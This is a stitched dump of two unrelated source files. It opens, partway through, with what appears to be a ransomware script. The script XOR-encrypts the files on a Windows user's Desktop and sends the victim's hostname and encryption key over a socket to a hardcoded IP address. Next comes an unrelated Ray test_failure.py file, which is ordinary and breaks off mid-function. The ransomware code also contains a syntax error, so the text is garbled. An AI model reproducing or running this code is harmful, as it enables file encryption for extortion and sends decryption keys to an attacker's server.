for byte in data:
xor_byte = byte ^ ord(key[key_index])
with open(file, 'ab') as f:
f.write(xor_byte.to_bytes(1, 'little'))
if key_index >= max_key_index:
key_index = 0
else:
key_index += 1
print(f'{file} encrypted successfully')
except:
print(f'Failed to encrypt {file}')
q.task_done()
# socket info
ipAddr = '192.0.0.44'
port = 4555
# encryption info
encryptionLevel = 512 // 8
keyCharOptions = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz1234567890~`!@#$%^&*()_+=-<>?'
keyCharOptionsLen = len(keyCharOptions)
# grab the files to encrypt
print('Getting files ready...')
desktopPath = os.environ['USERPROFILE'] + '\\Desktop'
files = os.listdir(desktopPath)
absFiles = []
for f in files:
if os.path.isfile(f'{desktopPath}\\{f}') and f != __file__[:-2]+'exe':
absFiles.append(f'{desktopPath}\\{f}')
print('successfulle located all te files')
# grab clients hostname
hostname = os.getenv('COMPUTERNAME')
# generate the key
print('generating the key')
key = ''
for i in range(encryptionLevel):
key += keyCharOptions[random.randint(0, keyCharOptionsLen = 1)]
print('key generated')
# connect to the server and send the key and hostname
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
s.connect((ipAddr, port))
print('successfully connected. sending hostname and key...')
s.send(f'{hostname} : {key}'.encode('utf-8'))
print('finished transmitting data')
s.close()
# store the files in a queue for the threads to handle
q = queue.Queue()
for f in absFiles:
q.put(f)
# setup threads to get ready for encryption
for i in range(10):
t = threading.Thread(target=encrypt, args=(key,), daemon=True)
t.start()
q.join()
print('encryption and upload complete')
input()
|
test_failure.py
|
import json
import logging
import os
import signal
import sys
import tempfile
import threading
import time
import numpy as np
import pytest
import redis
import ray
import ray.utils
import ray.ray_constants as ray_constants
from ray.exceptions import RayTaskError
from ray.cluster_utils import Cluster
from ray.test_utils import (
wait_for_condition,
SignalActor,
init_error_pubsub,
get_error_message,
Semaphore,
new_scheduler_enabled,
)
def test_failed_task(ray_start_regular, error_pubsub):
@ray.remote
def throw_exception_fct1():
raise Exception("Test function 1 intentionally failed.")
@ray.remote
def throw_exception_fct2():
raise Exception("Test function 2 intentionally failed.")
@ray.remote(num_returns=3)
def throw_exception_fct3(x):
raise Exception("Test function 3 intentionally failed.")
p = error_pubsub
throw_exception_fct1.remote()
throw_exception_fct1.remote()
msgs = get_error_message(p, 2, ray_constants.TASK_PUSH_ERROR)
assert len(msgs) == 2
for msg in msgs:
assert "Test function 1 intentionally failed." in msg.error_message
x = throw_exception_fct2.remote()
try:
ray.get(x)
except Exception as e:
assert "Test function 2 intentionally failed." in str(e)
else:
# ray.get should throw an exception.
assert False
x, y, z = throw_exception_fct3.remote(1.0)
for ref in [x, y, z]:
try:
ray.get(ref)
except Exception as e:
assert "Test function 3 intentionally failed." in str(e)
else:
# ray.get should throw an exception.
assert False
class CustomException(ValueError):
pass
@ray.remote
def f():
raise CustomException("This function failed.")
try:
ray.get(f.remote())
except Exception as e:
assert "This function failed." in str(e)
assert isinstance(e, CustomException)
assert isinstance(e, ray.exceptions.RayTaskError)
assert "RayTaskError(CustomException)" in repr(e)
else:
# ray.get should throw an exception.
assert False
def test_push_error_to_driver_through_redis(ray_start_regular, error_pubsub):
address_info = ray_start_regular
address = address_info["redis_address"]
redis_client = ray._private.services.create_redis_client(
address, password=ray.ray_constants.REDIS_DEFAULT_PASSWORD)
error_message = "Test error message"
ray.utils.push_error_to_driver_through_redis(
redis_client, ray_constants.DASHBOARD_AGENT_DIED_ERROR, error_message)
errors = get_error_message(error_pubsub, 1,
ray_constants.DASHBOARD_AGENT_DIED_ERROR)
assert errors[0].type == ray_constants.DASHBOARD_AGENT_DIED_ERROR
assert errors[0].error_message == error_message
def test_get_throws_quickly_when_found_exception(ray_start_regular):
# We use an actor instead of functions here. If we use functions, it's
# very likely that two normal tasks are submitted before the first worker
# is registered to Raylet. Since `maximum_startup_concurrency` is 1,
# the worker pool will wait for the registration of the first worker
# and skip starting new workers. The result is, the two tasks will be
# executed sequentially, which breaks an assumption of this test case -
# the two tasks run in parallel.
@ray.remote
class Actor(object):
def bad_func1(self):
raise Exception("Test function intentionally failed.")
def bad_func2(self):
os._exit(0)
def slow_func(self, signal):
ray.get(signal.wait.remote())
def expect_exception(objects, exception):
with pytest.raises(ray.exceptions.RayError) as err:
ray.get(objects)
assert err.type is exception
signal1 = SignalActor.remote()
actor = Actor.options(max_concurrency=2).remote()
expect_exception(
[actor.bad_func1.remote(),
actor.slow_func.remote(signal1)], ray.exceptions.RayTaskError)
ray.get(signal1.send.remote())
signal2 = SignalActor.remote()
actor = Actor.options(max_concurrency=2).remote()
expect_exception(
[actor.bad_func2.remote(),
actor.slow_func.remote(signal2)], ray.exceptions.RayActorError)
ray.get(signal2.send.remote())
def test_fail_importing_remote_function(ray_start_2_cpus, error_pubsub):
p = error_pubsub
# Create the contents of a temporary Python file.
temporary_python_file = """
def temporary_helper_function():
return 1
"""
f = tempfile.NamedTemporaryFile(suffix=".py")
f.write(temporary_python_file.encode("ascii"))
f.flush()
directory = os.path.dirname(f.name)
# Get the module name and strip ".py" from the end.
module_name = os.path.basename(f.name)[:-3]
sys.path.append(directory)
module = __import__(module_name)
# Define a function that closes over this temporary module. This should
# fail when it is unpickled.
@ray.remote
def g(x, y=3):
try:
module.temporary_python_file()
except Exception:
# This test is not concerned with the error from running this
# function. Only from unpickling the remote function.
pass
# Invoke the function so that the definition is exported.
g.remote(1, y=2)
errors = get_error_message(
p, 2, ray_constants.REGISTER_REMOTE_FUNCTION_PUSH_ERROR)
assert errors[0].type == ray_constants.REGISTER_REMOTE_FUNCTION_PUSH_ERROR
assert "No module named" in errors[0].error_message
assert "No module named" in errors[1].error_message
# Check that if we try to call the function it throws an exception and
# does not hang.
for _ in range(10):
with pytest.raises(
Exception, match="This function was not imported properly."):
ray.get(g.remote(1, y=2))
f.close()
# Clean up the junk we added to sys.path.
sys.path.pop(-1)
def test_failed_function_to_run(ray_start_2_cpus, error_pubsub):
p = error_pubsub
def f(worker):
if ray.worker.global_worker.mode == ray.WORKER_MODE:
raise Exception("Function to run failed.")
ray.worker.global_worker.run_function_on_all_workers(f)
# Check that the error message is in the task info.
errors = get_error_message(p, 2, ray_constants.FUNCTION_TO_RUN_PUSH_ERROR)
assert len(errors) == 2
assert errors[0].type == ray_constants.FUNCTION_TO_RUN_PUSH_ERROR
assert "Function to run failed." in errors[0].error_message
assert "Function to run failed." in errors[1].error_message
def test_fail_importing_actor(ray_start_regular, error_pubsub):
p = error_pubsub
# Create the contents of a temporary Python file.
temporary_python_file = """
def temporary_helper_function():
return 1
"""
f = tempfile.NamedTemporaryFile(suffix=".py")
f.write(temporary_python_file.encode("ascii"))
f.flush()
directory = os.path.dirname(f.name)
# Get the module name and strip ".py" from the end.
module_name = os.path.basename(f.name)[:-3]
sys.path.append(directory)
module = __import__(module_name)
# Define an actor that closes over this temporary module. This should
# fail when it is unpickled.
@ray.remote
class Foo:
def __init__(self, arg1, arg2=3):
self.x = module.temporary_python_file()
def get_val(self, arg1, arg2=3):
return 1
# There should be no errors yet.
errors = get_error_message(p, 2)
assert len(errors) == 0
# Create an actor.
foo = Foo.remote(3, arg2=0)
errors = get_error_message(p, 2)
assert len(errors) == 2
for error in errors:
# Wait for the error to arrive.
if error.type == ray_constants.REGISTER_ACTOR_PUSH_ERROR:
assert "No module named" in error.error_message
else:
# Wait for the error from when the __init__ tries to run.
assert ("failed to be imported, and so cannot execute this method"
in error.error_message)
# Check that if we try to get the function it throws an exception and
# does not hang.
with pytest.raises(Exception, match="failed to be imported"):
ray.get(foo.get_val.remote(1, arg2=2))
# Wait for the error from when the call to get_val.
errors = get_error_message(p, 1, ray_constants.TASK_PUSH_ERROR)
assert len(errors) == 1
assert errors[0].type == ray_constants.TASK_PUSH_ERROR
assert ("failed to be imported, and so cannot execute this method" in
errors[0].error_message)
f.close()
# Clean up the junk we added to sys.path.
sys.path.pop(-1)
def test_failed_actor_init(ray_start_regular, error_pubsub):
p = error_pubsub
error_message1 = "actor constructor failed"
error_message2 = "actor method failed"
@ray.remote
class FailedActor:
def __init__(self):
raise Exception(error_message1)
def fail_method(self):
raise Exception(error_message2)
a = FailedActor.remote()
# Make sure that we get errors from a failed constructor.
errors = get_error_message(p, 1, ray_constants.TASK_PUSH_ERROR)
assert len(errors) == 1
assert errors[0].type == ray_constants.TASK_PUSH_ERROR
assert error_message1 in errors[0].error_message
# Make sure that we get errors from a failed method.
a.fail_method.remote()
errors = get_error_message(p, 1, ray_constants.TASK_PUSH_ERROR)
assert len(errors) == 1
assert errors[0].type == ray_constants.TASK_PUSH_ERROR
assert error_message1 in errors[0].error_message
def test_failed_actor_method(ray_start_regular, error_pubsub):
p = error_pubsub
error_message2 = "actor method failed"
@ray.remote
class FailedActor:
def __init__(self):
pass
def fail_method(self):
raise Exception(error_message2)
a = FailedActor.remote()
# Make sure that we get errors from a failed method.
a.fail_method.remote()
errors = get_error_message(p, 1, ray_constants.TASK_PUSH_ERROR)
assert len(errors) == 1
assert errors[0].type == ray_constants.TASK_PUSH_ERROR
assert error_message2 in errors[0].error_message
def test_incorrect_method_calls(ray_start_regular):
@ray.remote
class Actor:
def __init__(self, missing_variable_name):
pass
def get_val(self, x):
pass
# Make sure that we get errors if we call the constructor incorrectly.
# Create an actor with too few arguments.
with pytest.raises(Exception):
a = Actor.remote()
# Create an actor with too many arguments.
with pytest.raises(Exception):
a = Actor.remote(1, 2)
# Create an actor the correct number of arguments.
a = Actor.remote(1)
# Call a method with too few arguments.
with pytest.raises(Exception):
a.get_val.remote()
# Call a method with too many arguments.
with pytest.raises(Exception):
a.get_val.remote(1, 2)
# Call a method that doesn't exist.
with pytest.raises(AttributeError):
a.nonexistent_method()
with pytest.raises(AttributeError):
a.nonexistent_method.remote()
def test_worker_raising_exception(ray_start_regular, error_pubsub):
p = error_pubsub
@ray.remote(max_calls=2)
def f():
        # This is the only reasonable variable we can set here that makes the
        # execute_task function fail after the task has executed.
worker = ray.worker.global_worker
worker.function_actor_manager.increase_task_counter = None
# Running this task should cause the worker to raise an exception after
# the task has successfully completed.
f.remote()
errors = get_error_message(p, 1, ray_constants.WORKER_CRASH_PUSH_ERROR)
assert len(errors) == 1
assert errors[0].type == ray_constants.WORKER_CRASH_PUSH_ERROR
def test_worker_dying(ray_start_regular, error_pubsub):
p = error_pubsub
# Define a remote function that will kill the worker that runs it.
@ray.remote(max_retries=0)
def f():
eval("exit()")
with pytest.raises(ray.exceptions.WorkerCrashedError):
ray.get(f.remote())
errors = get_error_message(p, 1, ray_constants.WORKER_DIED_PUSH_ERROR)
assert len(errors) == 1
assert errors[0].type == ray_constants.WORKER_DIED_PUSH_ERROR
assert "died or was killed while executing" in errors[0].error_message
def test_actor_worker_dying(ray_start_regular, error_pubsub):
p = error_pubsub
@ray.remote
class Actor:
def kill(self):
eval("exit()")
@ray.remote
def consume(x):
pass
a = Actor.remote()
[obj], _ = ray.wait([a.kill.remote()], timeout=5)
with pytest.raises(ray.exceptions.RayActorError):
ray.get(obj)
with pytest.raises(ray.exceptions.RayTaskError):
ray.get(consume.remote(obj))
errors = get_error_message(p, 1, ray_constants.WORKER_DIED_PUSH_ERROR)
assert len(errors) == 1
assert errors[0].type == ray_constants.WORKER_DIED_PUSH_ERROR
def test_actor_worker_dying_future_tasks(ray_start_regular, error_pubsub):
p = error_pubsub
@ray.remote(max_restarts=0)
class Actor:
def getpid(self):
return os.getpid()
def sleep(self):
time.sleep(1)
a = Actor.remote()
pid = ray.get(a.getpid.remote())
tasks1 = [a.sleep.remote() for _ in range(10)]
os.kill(pid, 9)
time.sleep(0.1)
tasks2 = [a.sleep.remote() for _ in range(10)]
for obj in tasks1 + tasks2:
with pytest.raises(Exception):
ray.get(obj)
errors = get_error_message(p, 1, ray_constants.WORKER_DIED_PUSH_ERROR)
assert len(errors) == 1
assert errors[0].type == ray_constants.WORKER_DIED_PUSH_ERROR
def test_actor_worker_dying_nothing_in_progress(ray_start_regular):
@ray.remote(max_restarts=0)
class Actor:
def getpid(self):
return os.getpid()
a = Actor.remote()
pid = ray.get(a.getpid.remote())
os.kill(pid, 9)
time.sleep(0.1)
task2 = a.getpid.remote()
with pytest.raises(Exception):
ray.get(task2)
def test_actor_scope_or_intentionally_killed_message(ray_start_regular,
error_pubsub):
p = error_pubsub
@ray.remote
class Actor:
def __init__(self):
# This log is added to debug a flaky test issue.
print(os.getpid())
def ping(self):
pass
a = Actor.remote()
    # Without this wait, there seems to be a race condition in the CI.
    # This is not a fundamental fix for that, but it at least makes the
    # test less flaky.
ray.get(a.ping.remote())
a = Actor.remote()
a.__ray_terminate__.remote()
time.sleep(1)
errors = get_error_message(p, 1)
    assert len(errors) == 0, "Should not have propagated an error - {}".format(
errors)
def test_exception_chain(ray_start_regular):
@ray.remote
def bar():
return 1 / 0
@ray.remote
def foo():
return ray.get(bar.remote())
r = foo.remote()
try:
ray.get(r)
except ZeroDivisionError as ex:
assert isinstance(ex, RayTaskError)
@pytest.mark.skip("This test does not work yet.")
@pytest.mark.parametrize(
"ray_start_object_store_memory", [10**6], indirect=True)
def test_put_error1(ray_start_object_store_memory, error_pubsub):
p = error_pubsub
num_objects = 3
object_size = 4 * 10**5
# Define a task with a single dependency, a numpy array, that returns
# another array.
@ray.remote
def single_dependency(i, arg):
arg = np.copy(arg)
arg[0] = i
return arg
@ray.remote
def put_arg_task():
# Launch num_objects instances of the remote task, each dependent
# on the one before it. The result of the first task should get
# evicted.
args = []
arg = single_dependency.remote(0, np.zeros(
object_size, dtype=np.uint8))
for i in range(num_objects):
arg = single_dependency.remote(i, arg)
args.append(arg)
# Get the last value to force all tasks to finish.
value = ray.get(args[-1])
assert value[0] == i
# Get the first value (which should have been evicted) to force
# reconstruction. Currently, since we're not able to reconstruct
# `ray.put` objects that were evicted and whose originating tasks
        # are still running, this call should hang and push an error to
# the driver.
ray.get(args[0])
put_arg_task.remote()
# Make sure we receive the correct error message.
errors = get_error_message(p, 1,
ray_constants.PUT_RECONSTRUCTION_PUSH_ERROR)
assert len(errors) == 1
assert errors[0].type == ray_constants.PUT_RECONSTRUCTION_PUSH_ERROR
@pytest.mark.skip("This test does not work yet.")
@pytest.mark.parametrize(
"ray_start_object_store_memory", [10**6], indirect=True)
def test_put_error2(ray_start_object_store_memory):
# This is the same as the previous test, but it calls ray.put directly.
num_objects = 3
object_size = 4 * 10**5
# Define a task with a single dependency, a numpy array, that returns
# another array.
@ray.remote
def single_dependency(i, arg):
arg = np.copy(arg)
arg[0] = i
return arg
@ray.remote
def put_task():
# Launch num_objects instances of the remote task, each dependent
# on the one before it. The result of the first task should get
# evicted.
args = []
arg = ray.put(np.zeros(object_size, dtype=np.uint8))
for i in range(num_objects):
arg = single_dependency.remote(i, arg)
args.append(arg)
# Get the last value to force all tasks to finish.
value = ray.get(args[-1])
assert value[0] == i
# Get the first value (which should have been evicted) to force
# reconstruction. Currently, since we're not able to reconstruct
# `ray.put` objects that were evicted and whose originating tasks
        # are still running, this call should hang and push an error to
# the driver.
ray.get(args[0])
put_task.remote()
# Make sure we receive the correct error message.
# get_error_message(ray_constants.PUT_RECONSTRUCTION_PUSH_ERROR, 1)
@pytest.mark.skip("Publish happens before we subscribe to it")
def test_version_mismatch(error_pubsub, shutdown_only):
ray_version = ray.__version__
ray.__version__ = "fake ray version"
ray.init(num_cpus=1)
p = error_pubsub
errors = get_error_message(p, 1, ray_constants.VERSION_MISMATCH_PUSH_ERROR)
assert False, errors
assert len(errors) == 1
assert errors[0].type == ray_constants.VERSION_MISMATCH_PUSH_ERROR
# Reset the version.
ray.__version__ = ray_version
def test_export_large_objects(ray_start_regular, error_pubsub):
p = error_pubsub
import ray.ray_constants as ray_constants
large_object = np.zeros(2 * ray_constants.PICKLE_OBJECT_WARNING_SIZE)
@ray.remote
def f():
large_object
# Invoke the function so that the definition is exported.
f.remote()
# Make sure that a warning is generated.
errors = get_error_message(p, 1,
ray_constants.PICKLING_LARGE_OBJECT_PUSH_ERROR)
assert len(errors) == 1
assert errors[0].type == ray_constants.PICKLING_LARGE_OBJECT_PUSH_ERROR
@ray.remote
class Foo:
def __init__(self):
large_object
Foo.remote()
# Make sure that a warning is generated.
errors = get_error_message(p, 1,
ray_constants.PICKLING_LARGE_OBJECT_PUSH_ERROR)
assert len(errors) == 1
assert errors[0].type == ray_constants.PICKLING_LARGE_OBJECT_PUSH_ERROR
@pytest.mark.skip(reason="TODO detect resource deadlock")
def test_warning_for_resource_deadlock(error_pubsub, shutdown_only):
p = error_pubsub
    # Check that we get a warning message when tasks deadlock on resources.
ray.init(num_cpus=1)
@ray.remote(num_cpus=1)
class Foo:
def f(self):
return 0
@ray.remote
def f():
# Creating both actors is not possible.
actors = [Foo.remote() for _ in range(2)]
for a in actors:
ray.get(a.f.remote())
# Run in a task to check we handle the blocked task case correctly
f.remote()
errors = get_error_message(p, 1, ray_constants.RESOURCE_DEADLOCK_ERROR)
assert len(errors) == 1
assert errors[0].type == ray_constants.RESOURCE_DEADLOCK_ERROR
@pytest.mark.skipif(new_scheduler_enabled(), reason="broken")
def test_warning_for_infeasible_tasks(ray_start_regular, error_pubsub):
p = error_pubsub
# Check that we get warning messages for infeasible tasks.
@ray.remote(num_gpus=1)
def f():
pass
@ray.remote(resources={"Custom": 1})
class Foo:
pass
# This task is infeasible.
f.remote()
errors = get_error_message(p, 1, ray_constants.INFEASIBLE_TASK_ERROR)
assert len(errors) == 1
assert errors[0].type == ray_constants.INFEASIBLE_TASK_ERROR
# This actor placement task is infeasible.
Foo.remote()
errors = get_error_message(p, 1, ray_constants.INFEASIBLE_TASK_ERROR)
assert len(errors) == 1
assert errors[0].type == ray_constants.INFEASIBLE_TASK_ERROR
@pytest.mark.skipif(new_scheduler_enabled(), reason="broken")
def test_warning_for_infeasible_zero_cpu_actor(shutdown_only):
# Check that we cannot place an actor on a 0 CPU machine and that we get an
# infeasibility warning (even though the actor creation task itself
# requires no CPUs).
ray.init(num_cpus=0)
p = init_error_pubsub()
@ray.remote
class Foo:
pass
# The actor creation should be infeasible.
Foo.remote()
errors = get_error_message(p, 1, ray_constants.INFEASIBLE_TASK_ERROR)
assert len(errors) == 1
assert errors[0].type == ray_constants.INFEASIBLE_TASK_ERROR
p.close()
def test_warning_for_too_many_actors(shutdown_only):
    # Check that if we run a workload which requires too many workers to be
    # started, we will receive a warning.
num_cpus = 2
ray.init(num_cpus=num_cpus)
p = init_error_pubsub()
@ray.remote
class Foo:
def __init__(self):
time.sleep(1000)
[Foo.remote() for _ in range(num_cpus * 3)]
errors = get_error_message(p, 1, ray_constants.WORKER_POOL_LARGE_ERROR)
assert len(errors) == 1
assert errors[0].type == ray_constants.WORKER_POOL_LARGE_ERROR
[Foo.remote() for _ in range(num_cpus)]
errors = get_error_message(p, 1, ray_constants.WORKER_POOL_LARGE_ERROR)
assert len(errors) == 1
assert errors[0].type == ray_constants.WORKER_POOL_LARGE_ERROR
p.close()
def test_warning_for_too_many_nested_tasks(shutdown_only):
    # Check that if we run a workload which requires too many workers to be
    # started, we will receive a warning.
num_cpus = 2
ray.init(num_cpus=num_cpus)
p = init_error_pubsub()
remote_wait = Semaphore.remote(value=0)
nested_wait = Semaphore.remote(value=0)
ray.get([
remote_wait.locked.remote(),
nested_wait.locked.remote(),
])
@ray.remote
def f():
time.sleep(1000)
return 1
@ray.remote
def h(nested_waits):
nested_wait.release.remote()
ray.get(nested_waits)
ray.get(f.remote())
@ray.remote
def g(remote_waits, nested_waits):
        # Block on the semaphores (rather than sleeping) so that the f tasks
        # all get submitted to the scheduler after the g tasks.
remote_wait.release.remote()
# wait until every lock is released.
ray.get(remote_waits)
ray.get(h.remote(nested_waits))
num_root_tasks = num_cpus * 4
# Lock remote task until everything is scheduled.
remote_waits = []
nested_waits = []
for _ in range(num_root_tasks):
remote_waits.append(remote_wait.acquire.remote())
nested_waits.append(nested_wait.acquire.remote())
[g.remote(remote_waits, nested_waits) for _ in range(num_root_tasks)]
errors = get_error_message(p, 1, ray_constants.WORKER_POOL_LARGE_ERROR)
assert len(errors) == 1
assert errors[0].type == ray_constants.WORKER_POOL_LARGE_ERROR
p.close()
def test_warning_for_many_duplicate_remote_functions_and_actors(shutdown_only):
ray.init(num_cpus=1)
@ray.remote
def create_remote_function():
@ray.remote
def g():
return 1
return ray.get(g.remote())
for _ in range(ray_constants.DUPLICATE_REMOTE_FUNCTION_THRESHOLD - 1):
ray.get(create_remote_function.remote())
import io
log_capture_string = io.StringIO()
ch = logging.StreamHandler(log_capture_string)
# TODO(rkn): It's terrible to have to rely on this implementation detail,
# the fact that the warning comes from ray.import_thread.logger. However,
# I didn't find a good way to capture the output for all loggers
# simultaneously.
ray.import_thread.logger.addHandler(ch)
ray.get(create_remote_function.remote())
start_time = time.time()
while time.time() < start_time + 10:
log_contents = log_capture_string.getvalue()
if len(log_contents) > 0:
break
ray.import_thread.logger.removeHandler(ch)
assert "remote function" in log_contents
assert "has been exported {} times.".format(
ray_constants.DUPLICATE_REMOTE_FUNCTION_THRESHOLD) in log_contents
# Now test the same thing but for actors.
@ray.remote
def create_actor_class():
# Require a GPU so that the actor is never actually created and we
# don't spawn an unreasonable number of processes.
@ray.remote(num_gpus=1)
class Foo:
pass
Foo.remote()
for _ in range(ray_constants.DUPLICATE_REMOTE_FUNCTION_THRESHOLD - 1):
ray.get(create_actor_class.remote())
log_capture_string = io.StringIO()
ch = logging.StreamHandler(log_capture_string)
# TODO(rkn): As mentioned above, it's terrible to have to rely on this
# implementation detail.
ray.import_thread.logger.addHandler(ch)
ray.get(create_actor_class.remote())
start_time = time.time()
while time.time() < start_time + 10:
log_contents = log_capture_string.getvalue()
if len(log_contents) > 0:
break
ray.import_thread.logger.removeHandler(ch)
assert "actor" in log_contents
assert "has been exported {} times.".format(
ray_constants.DUPLICATE_REMOTE_FUNCTION_THRESHOLD) in log_contents
def test_redis_module_failure(ray_start_regular):
address_info = ray_start_regular
address = address_info["redis_address"]
address = address.split(":")
assert len(address) == 2
def run_failure_test(expecting_message, *command):
with pytest.raises(
Exception, match=".*{}.*".format(expecting_message)):
client = redis.StrictRedis(
host=address[0],
port=int(address[1]),
password=ray_constants.REDIS_DEFAULT_PASSWORD)
client.execute_command(*command)
def run_one_command(*command):
client = redis.StrictRedis(
host=address[0],
port=int(address[1]),
password=ray_constants.REDIS_DEFAULT_PASSWORD)
client.execute_command(*command)
run_failure_test("wrong number of arguments", "RAY.TABLE_ADD", 13)
run_failure_test("Prefix must be in the TablePrefix range",
"RAY.TABLE_ADD", 100000, 1, 1, 1)
run_failure_test("Prefix must be in the TablePrefix range",
"RAY.TABLE_REQUEST_NOTIFICATIONS", 100000, 1, 1, 1)
run_failure_test("Prefix must be a valid TablePrefix integer",
"RAY.TABLE_ADD", b"a", 1, 1, 1)
run_failure_test("Pubsub channel must be in the TablePubsub range",
"RAY.TABLE_ADD", 1, 10000, 1, 1)
run_failure_test("Pubsub channel must be a valid integer", "RAY.TABLE_ADD",
1, b"a", 1, 1)
# Change the key from 1 to 2, since the previous command should have
# succeeded at writing the key, but not publishing it.
run_failure_test("Index is less than 0.", "RAY.TABLE_APPEND", 1, 1, 2, 1,
-1)
run_failure_test("Index is not a number.", "RAY.TABLE_APPEND", 1, 1, 2, 1,
b"a")
run_one_command("RAY.TABLE_APPEND", 1, 1, 2, 1)
# It's okay to add duplicate entries.
run_one_command("RAY.TABLE_APPEND", 1, 1, 2, 1)
run_one_command("RAY.TABLE_APPEND", 1, 1, 2, 1, 0)
run_one_command("RAY.TABLE_APPEND", 1, 1, 2, 1, 1)
run_one_command("RAY.SET_ADD", 1, 1, 3, 1)
    # It's okay to add duplicate entries.
run_one_command("RAY.SET_ADD", 1, 1, 3, 1)
run_one_command("RAY.SET_REMOVE", 1, 1, 3, 1)
    # It's okay to remove duplicate entries.
run_one_command("RAY.SET_REMOVE", 1, 1, 3, 1)
# Note that this test will take at least 10 seconds because it must wait for
# the monitor to detect enough missed heartbeats.
def test_warning_for_dead_node(ray_start_cluster_2_nodes, error_pubsub):
cluster = ray_start_cluster_2_nodes
cluster.wait_for_nodes()
p = error_pubsub
node_ids = {item["NodeID"] for item in ray.nodes()}
# Try to make sure that the monitor has received at least one heartbeat
# from the node.
time.sleep(0.5)
# Kill both raylets.
cluster.list_all_nodes()[1].kill_raylet()
cluster.list_all_nodes()[0].kill_raylet()
# Check that we get warning messages for both raylets.
errors = get_error_message(p, 2, ray_constants.REMOVED_NODE_ERROR, 40)
    # Extract the node IDs from the error messages. This will need to be
# changed if the error message changes.
warning_node_ids = {error.error_message.split(" ")[5] for error in errors}
assert node_ids == warning_node_ids
def test_raylet_crash_when_get(ray_start_regular):
def sleep_to_kill_raylet():
# Don't kill raylet before default workers get connected.
time.sleep(2)
ray.worker._global_node.kill_raylet()
object_ref = ray.put(np.zeros(200 * 1024, dtype=np.uint8))
ray.internal.free(object_ref)
thread = threading.Thread(target=sleep_to_kill_raylet)
thread.start()
with pytest.raises(ray.exceptions.ObjectLostError):
ray.get(object_ref)
thread.join()
@pytest.mark.skipif(new_scheduler_enabled(), reason="broken")
def test_connect_with_disconnected_node(shutdown_only):
config = {
"num_heartbeats_timeout": 50,
"raylet_heartbeat_timeout_milliseconds": 10,
}
cluster = Cluster()
cluster.add_node(num_cpus=0, _system_config=config)
ray.init(address=cluster.address)
p = init_error_pubsub()
errors = get_error_message(p, 1, timeout=5)
assert len(errors) == 0
    # This node is killed by SIGKILL, so ray_monitor will mark it as dead.
dead_node = cluster.add_node(num_cpus=0)
cluster.remove_node(dead_node, allow_graceful=False)
errors = get_error_message(p, 1, ray_constants.REMOVED_NODE_ERROR)
assert len(errors) == 1
    # This node is killed by SIGKILL, so ray_monitor will mark it as dead.
dead_node = cluster.add_node(num_cpus=0)
cluster.remove_node(dead_node, allow_graceful=False)
errors = get_error_message(p, 1, ray_constants.REMOVED_NODE_ERROR)
assert len(errors) == 1
    # This node is removed gracefully by SIGTERM, so ray_monitor will not
    # mark it as dead.
removing_node = cluster.add_node(num_cpus=0)
cluster.remove_node(removing_node, allow_graceful=True)
errors = get_error_message(p, 1, timeout=2)
assert len(errors) == 0
# There is no connection error to a dead node.
errors = get_error_message(p, 1, timeout=2)
assert len(errors) == 0
p.close()
@pytest.mark.parametrize(
"ray_start_cluster_head", [{
"num_cpus": 5,
"object_store_memory": 10**8,
"_system_config": {
"object_store_full_max_retries": 0
}
}],
indirect=True)
def test_parallel_actor_fill_plasma_retry(ray_start_cluster_head):
@ray.remote
class LargeMemoryActor:
def some_expensive_task(self):
return np.zeros(10**8 // 2, dtype=np.uint8)
actors = [LargeMemoryActor.remote() for _ in range(5)]
for _ in range(10):
pending = [a.some_expensive_task.remote() for a in actors]
while pending:
[done], pending = ray.wait(pending, num_returns=1)
def test_fill_object_store_exception(shutdown_only):
ray.init(
num_cpus=2,
object_store_memory=10**8,
_system_config={"object_store_full_max_retries": 0})
@ray.remote
def expensive_task():
return np.zeros((10**8) // 10, dtype=np.uint8)
with pytest.raises(ray.exceptions.RayTaskError) as e:
ray.get([expensive_task.remote() for _ in range(20)])
with pytest.raises(ray.exceptions.ObjectStoreFullError):
raise e.as_instanceof_cause()
@ray.remote
class LargeMemoryActor:
def some_expensive_task(self):
return np.zeros(10**8 + 2, dtype=np.uint8)
def test(self):
return 1
actor = LargeMemoryActor.remote()
with pytest.raises(ray.exceptions.RayTaskError):
ray.get(actor.some_expensive_task.remote())
# Make sure actor does not die
ray.get(actor.test.remote())
with pytest.raises(ray.exceptions.ObjectStoreFullError):
ray.put(np.zeros(10**8 + 2, dtype=np.uint8))
def test_fill_object_store_lru_fallback(shutdown_only):
config = {
"free_objects_batch_size": 1,
}
ray.init(
num_cpus=2,
object_store_memory=10**8,
_lru_evict=True,
_system_config=config)
@ray.remote
def expensive_task():
return np.zeros((10**8) // 2, dtype=np.uint8)
# Check that objects out of scope are cleaned up quickly.
ray.get(expensive_task.remote())
start = time.time()
for _ in range(3):
ray.get(expensive_task.remote())
end = time.time()
assert end - start < 3
obj_refs = []
for _ in range(3):
obj_ref = expensive_task.remote()
ray.get(obj_ref)
obj_refs.append(obj_ref)
@ray.remote
class LargeMemoryActor:
def some_expensive_task(self):
return np.zeros(10**8 // 2, dtype=np.uint8)
def test(self):
return 1
actor = LargeMemoryActor.remote()
for _ in range(3):
obj_ref = actor.some_expensive_task.remote()
ray.get(obj_ref)
obj_refs.append(obj_ref)
# Make sure actor does not die
ray.get(actor.test.remote())
for _ in range(3):
obj_ref = ray.put(np.zeros(10**8 // 2, dtype=np.uint8))
ray.get(obj_ref)
obj_refs.append(obj_ref)
@pytest.mark.parametrize(
"ray_start_cluster", [{
"num_nodes": 1,
"num_cpus": 2,
}, {
"num_nodes": 2,
"num_cpus": 1,
}],
indirect=True)
def test_eviction(ray_start_cluster):
@ray.remote
def large_object():
return np.zeros(10 * 1024 * 1024)
obj = large_object.remote()
assert (isinstance(ray.get(obj), np.ndarray))
# Evict the object.
ray.internal.free([obj])
# ray.get throws an exception.
with pytest.raises(ray.exceptions.ObjectLostError):
ray.get(obj)
@ray.remote
def dependent_task(x):
return
# If the object is passed by reference, the task throws an
# exception.
with pytest.raises(ray.exceptions.RayTaskError):
ray.get(dependent_task.remote(obj))
@pytest.mark.parametrize(
"ray_start_cluster", [{
"num_nodes": 2,
"num_cpus": 1,
}, {
"num_nodes": 1,
"num_cpus": 2,
}],
indirect=True)
def test_serialized_id(ray_start_cluster):
@ray.remote
def small_object():
# Sleep a bit before creating the object to force a timeout
# at the getter.
time.sleep(1)
return 1
@ray.remote
def dependent_task(x):
return x
@ray.remote
def get(obj_refs, test_dependent_task):
print("get", obj_refs)
obj_ref = obj_refs[0]
if test_dependent_task:
